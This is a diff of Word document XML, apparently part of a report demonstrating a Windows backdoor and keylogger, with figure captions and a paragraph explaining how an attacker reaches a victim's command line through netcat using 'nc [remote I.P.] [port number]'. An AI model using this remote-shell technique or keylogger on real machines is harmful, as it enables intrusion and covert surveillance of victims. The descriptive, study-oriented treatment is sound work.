+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32252D01" wp14:editId="573C547B">
+                                  <wp:extent cx="5931535" cy="3110230"/>
+                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                                  <wp:docPr id="47" name="Picture 47"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 7"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId13">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5931535" cy="3110230"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>6</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Accessing the backdoor console</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="5089EB97" id="Text Box 2" o:spid="_x0000_s1031" type="#_x0000_t202" style="width:468pt;height:271.95pt;visibility:visible;mso-wrap-style:none;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32252D01" wp14:editId="573C547B">
+                            <wp:extent cx="5931535" cy="3110230"/>
+                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                            <wp:docPr id="47" name="Picture 47"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 7"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId13">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5931535" cy="3110230"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>6</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Accessing the backdoor console</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62FC18DC" wp14:editId="18A0C29E">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>54796</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1101260</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5943600" cy="3453679"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
+                <wp:wrapNone/>
+                <wp:docPr id="22" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5943600" cy="3453679"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175222A0" wp14:editId="5A27AC84">
+                                  <wp:extent cx="5937885" cy="3103880"/>
+                                  <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
+                                  <wp:docPr id="58" name="Picture 58"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 8"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId14">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5937885" cy="3103880"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>6.1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Backdoor initialization</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="62FC18DC" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:4.3pt;margin-top:86.7pt;width:468pt;height:271.95pt;z-index:-251648000;visibility:visible;mso-wrap-style:none;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175222A0" wp14:editId="5A27AC84">
+                            <wp:extent cx="5937885" cy="3103880"/>
+                            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
+                            <wp:docPr id="58" name="Picture 58"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 8"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId14">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5937885" cy="3103880"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>6.1</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Backdoor initialization</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 6 shows how the attacker can create an instance of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">windows command line </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>interface</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on the victim’s machine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Entering the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-c </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>command would connect to the server and connect the said attacker to a command line through netcat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This would execute the command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>nc [remote I.P.] [port number]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> allowing the attacker to access directories and send other commands to either the netcat server running on the remote machine </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>or the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command line which could directly interact with the Windows operating system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>This process would require the attacker to enter the remote machine’s I.P. address in order to establish the said connection that would connect him to the netcat server and access the command line.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B32CA27" wp14:editId="4D82262A">
+                <wp:extent cx="5943600" cy="3453679"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
+                <wp:docPr id="25" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5943600" cy="3453679"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C044308" wp14:editId="1F23A8C8">
+                                  <wp:extent cx="5937885" cy="3122295"/>
+                                  <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
+                                  <wp:docPr id="49" name="Picture 49"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 9"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId15">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5937885" cy="3122295"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>7</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>The key logger</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
